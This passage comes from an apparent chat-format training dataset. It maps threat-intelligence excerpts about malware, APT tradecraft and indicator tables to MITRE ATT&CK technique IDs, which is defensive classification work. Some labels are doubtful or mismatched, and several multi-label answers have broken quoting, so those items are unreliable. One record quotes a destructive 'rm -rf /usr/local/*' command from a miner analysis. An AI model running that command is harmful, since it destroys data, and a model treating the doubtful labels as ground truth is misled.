C2 communications." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROADTools can enumerate Azure AD systems and devices." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Harvest cookies and a password database for supported browsers. Supports: Win7 IE, Win10 IE, Edge, Chrome, and Naver Whale - Recursively search a path and upload file metadata (timestamps, size, and full path). - Spawn a thread to recursively search a path and upload files as a ZIP archive" }, { "role": "assistant", "content": "T1539 - Steal Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 3 Hardware ID used by XAgent to uniquely identify compromised hosts When generating the URLs within the HTTP POST and GET requests, XAgent sets one HTTP parameter using a specific data structure that contains this agent_id value" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The NETWIRE binary has been executed via PowerShell script." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cannon can obtain a list of processes running on the system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound malware has used HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker has the ability to save and execute files as an alternate data stream (ADS)." }, { "role": "assistant", "content": "T1564.004 - Hide Artifacts: NTFS File Attributes" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A JHUHUGIT variant accesses a screenshot saved in the clipboard and converts it to a JPG image." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It then reads and decrypts the content between these values to yield an IP address as shown below: ---- BEGIN SSH2 PUBLIC KEY ----Comment: \"rsa-key\"AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ=---- END SSH2 PUBLIC KEY ---- A Python script to decode strings encrypted with this technique is given in Appendix B – Python Scripts" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT1 has created email accounts for later use in social engineering, phishing, and when registering domains." }, { "role": "assistant", "content": "T1585.002 - Email Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table." }, { "role": "assistant", "content": "T1003.002 - OS Credential Dumping: Security Account Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot has been known to reach a command and control server via one of nine proxy IP addresses." }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During FunnyDream, the threat actors used Systeminfo to collect information on targeted hosts." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LiteDuke has the ability to decrypt and decode multiple layers of obfuscation." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has cleared select event log entries." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In 2017, Sandworm Team conducted technical research related to vulnerabilities associated with websites used by the Korean Sport and Olympic Committee, a Korean power company, and a Korean airport." }, { "role": "assistant", "content": "T1588.006 - Vulnerabilities" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections" }, { "role": "assistant", "content": "T1070.005 - Indicator Removal on Host: Network Share Connection Removal" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "But first: How did they get the tools on the victim’s systems. The adversary copied those tools over SMB from compromised system to compromised system wherever they needed these tools" }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Summary information for the three binaries we analyzed follows: MD5 364ff454dcf00420cff13a57bcb78467 SHA-256 8bca0031f3b691421cb15f9c6e71ce19335 5d2d8cf2b190438b6962761d0c6bb ssdeep 3072:n+1R4tREtGN4qyGCXdHPYK9l0H786 O26BmMAwyWMn/qwwiHNl:n+1R43QcIL XdF0w6IBmMAwwCwwi Size 141.2 KB (144560 bytes) Type ELF 64-bit (stripped) Install as root /bin/rsyncd Root install desc synchronize and backup service Install as non-root ~/.config/dbus-notifier/dbus-inotifier Non-root install desc system service d-bus notifier C2 azureon-line[.]com (TCP/80) Usage Timeframe Late 2014 Table 1: Sample 1 – Late 2014 Sofacy 64-bit Fysbis MD5 075b6695ab63f36af65f7ffd45cccd39 SHA-256 02c7cf55fd5c5809ce2dce56085ba43795f2 480423a4256537bfdfda0df85592 ssdeep 3072:9ZAxHANuat3WWFY9nqjwbuZf454U NqRpROIDLHaSeWb3LGmPTrIW33HxIajF: 9ZAxHANJAvbuZf454UN+rv eQLZPTrV3Z Size 175.9 KB (180148 bytes) Type ELF 32-bit (stripped) Install as root /bin/ksysdefd Root install desc system kernel service defender Install as non-root ~/.config/ksysdef/ksysdefd Non-root install desc system kernel service defender C2 198.105.125[.]74 (TCP/80) Usage Timeframe Early 2015 Table 2: Sample 2 – Early 2015 Sofacy 32-bit Fysbis MD5 e107c5c84ded6cd9391aede7f04d64c8 SHA-256 fd8b2ea9a2e8a67e4cb3904b49c789d57ed 9b1ce5bebfe54fe3d98214d6a0f61 ssdeep 6144:W/D5tpLWtr91gmaVy+mdckn6BCUd c4mLc2B9:4D5Lqgkcj+ Size 314.4 KB (321902 bytes) Type ELF 64-bit (not stripped) Install as root /bin/ksysdefd Root install desc system kernel service defender Install as non-root ~/.config/ksysdef/ksysdefd Non-root install desc system kernel service defender C2 mozilla-plugins[.]com (TCP/80) Usage Timeframe Late 2015 Table 3: Sample 3 – Late 2015 Sofacy 64-bit Fysbis Overall, these binaries are assessed as low sophistication, but effective" }, { "role": "assistant", "content": "T1082 - System Information Discovery', 'T1543.003 - Create or Modify System Process: Windows Service', 'T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may create a temporary user on the system named “Lost_{Unique Identifier}.”" }, { "role": "assistant", "content": "T1136 - Create Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has stolen user's saved passwords from Chrome." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Decoding these PowerShell scripts revealed that they are used to access paste.ee URLs for easy implementation of fileless payloads. The CallByName export function in Visual Basic is used to call the load of a .NET assembly within memory from a paste.ee URL." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remcos steals and modifies data from the clipboard." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IronNetInjector can use an IronPython scripts to load a .NET injector to inject a payload into its own or a remote process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. While this is not a new tactic, this is the first instance where we have observed the OilRig using it in their playbook. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AdFind can extract subnet information from Active Directory." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAWKBALL has methods to check if the process the malware uses is being debugged." }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpicyOmelette can identify payment systems, payment gateways, and ATM systems in compromised environments." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "lists the directories for Desktop, program files, and the user’s recently accessed files." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kessel has decrypted the binary's configuration once the \"main\" function was launched." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A macro deletes files after it has decoded and decompressed them." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has gathered a recursive directory listing to find files and directories of interest." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OutSteel has been distributed through malicious links contained within spearphishing emails." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Comnie executes the \"netstat -ano\" command." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a tool that can run DLLs." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As mentioned previously, this backdoor also supports loading plugins. The server creates a thread that searches for files matching the following pattern lPH*.dll. If such a file exists, it is loaded and its export function ModuleStart is called. Among the various plugins we have located so far, one is able to steal recent files and files from USB thumb drives" }, { "role": "assistant", "content": "T1025 - Data from Removable Media', 'T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Interestingly, the actors chose to leverage Cobalt Strike for lateral movement. The first of several beacon files are dropped onto the same infected endpoint running Brute Ratel C4, with the first being:" }, { "role": "assistant", "content": "T1588.002 - Tool', 'T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has discovered the local network configuration with ipconfig." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The cluster targeting Brazil used hacked websites and Google Ads to drive users to download the malicious installer. The campaign targeting other countries used spear-phishing as the delivery method" }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT has a module that steals passwords saved in victim web browsers." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "stages command output and collected data in files before exfiltration." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has bypassed UAC." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As has been previously reported, there are two variants of the trojan TinkaOTP. The version that has received the most attention contains the malware payload in the application bundle’s Resources folder. The dot prefix is added in order to make it invisible in the Finder. This payload is then executed via a user LaunchAgent at ~/Library/LaunchAgents/com.aex-loop.agent.plist" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used VBSscipt macros for execution on compromised hosts." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "C2 Command Purpose reboot Reboot the system using shutdown command shutdown Shut down the system using shutdown command clean Wipe the Drives, C:\\, D:\\, E:\\, F:\\ screenshot Take a screenshot of the System upload Encrypt and upload the information from the system excel Leverage Excel.Application COM object for code execution outlook Leverage Outlook.Application COM object for code execution risk Leverage DCOM object for code execution Conclusion This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware" }, { "role": "assistant", "content": "T1113 - Screen Capture', 'T1082 - System Information Discovery', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1106 - Native API', 'T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hydraq creates a backdoor through which remote attackers can clear all system event logs." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackdoorDiplomacy has obtained a variety of open-source reconnaissance and red team tools for discovery and lateral movement." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim’s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the “file-less” aspect of this method" }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The fourth spear phishing email of the campaign was sent on January 23, 2018 to a range of targets working for Tibetan NGOs, media groups, and the CTA. The message appeared to be sent from the Director of the Tibet Museum, which is an official museum of the CTA. Attached to the email were RTF and PPSX messages that claimed to present information about the National Museum of Tibet (see Figure 5). These files contained the CVE-2017-11882 and TSSL Suite infection chain" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emissary has the capability to execute \"gpresult\"." }, { "role": "assistant", "content": "T1615 - Group Policy Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as “Tinymet“. This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (eg. with the key equal to 0x50 or 0x51) piece of meterpreter shellcode to execute" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NavRAT is a remote access trojan (RAT) designed to upload, download and execute files. This screenshot shows the logs messages during the process injection with the API usage. NavRAT starts by copying itself (~emp.exe) to the %ProgramData%\\Ahnlab\\GoogleUpdate.exe path. NavRAT then creates a registry key in order to execute this file copy at the next reboot of the system, an initial method of persistence. The log files mentioned previously are stored in the same directory as NavRAT on the victim machine, again making it easy for us to find and analyse the additional log files. NavRAT has support for process injection. By using this method, it will copy itself into a running Internet Explorer process in order to avoid detection by running as an independent process" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In order to extend the lifespan of the domains in case one or more are blacklisted, there are twelve different C2 domains that xparis() can be set to" }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has disabled host-based firewalls. The group has also globally opened port 3389." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a virus that propagates by infecting executables stored on shared drives." }, { "role": "assistant", "content": "T1080 - Taint Shared Content" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has utilized tools to aggregate data prior to exfiltration." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CARROTBAT has the ability to execute command line arguments on a compromised host." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has acquired and used a variety of open source tools." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "jRAT can list security software, such as by using WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZLib communicates over HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The plugin is a Mimikatz version compiled in the Second_Release_PowerShell configuration. This version can be loaded into the address space of a PowerShell process via reflective DLL loading as implemented in the Exfiltration module of PowerSploit" }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group macros can scan for Microsoft Word and Excel files to inject with additional malicious macros. Gamaredon Group has also used its backdoors to automatically list interesting files (such as Office documents) found on a system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During FunnyDream, the threat actors used ipconfig for discovery on remote systems." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This transport library does not appear on disk in its PE format. It is maintained as encrypted resource 107 in the orchestrator module, then decrypted and loaded by the orchestrator directly into the memory of the target process. This C2 interaction module is independent, once started, it interacts with the orchestrator using its local named pipe" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN8 has used RDP for lateral movement." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "moved laterally via RDP." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It uses virtualization software – QEMU on macOS and VirtualBox on Windows – to mine cryptocurrency on a Tiny Core Linux virtual machine, making it cross platform. The admins of the site also frequently update the applications with newer versions, making it difficult to track the very first version of the miner. 2) Shell scripts used to launch the QEMU images. qemuservice shell script . After the dependencies are copied over, all miner-related daemons are launched and then the actual software is installed: - qemuservice won’t launch the image if the Activity Monitor process is running. In fact, if it is running, it will unload the plist that it was launched by. Before installation, version 1 of the miner is removed along with executing the command: rm -rf /usr/local/* . As seen in the listing in Script 2, it only does so when it detects a running qemu-system-x86_64 process. Launching the Linux image . All versions use multiple shell scripts to launch the images. Version 1 executes the following binaries (copies of qemu-system-x86_64) to launch the QEMU images: qemu-system-x86_64, system-monitor, tools-service. All versions use the following switches: - -M accel=hvf to use the Hypervisor framework as an accelerator. There are, however, some hints that can help you to identify when an application contains unwanted code: - A trust popup from an unexpected, “additional” installer (in this case the Oracle network adapter). - High CPU consumption by a process you did not install (QEMU or VirtualBox in this case). - A new service added to the startup services list (Windows) or a new Launch Daemon (macOS). - Network connections to curious domain names (such as system-update[.]info or system-check[.]services here). Indicators of Compromise (IoCs) 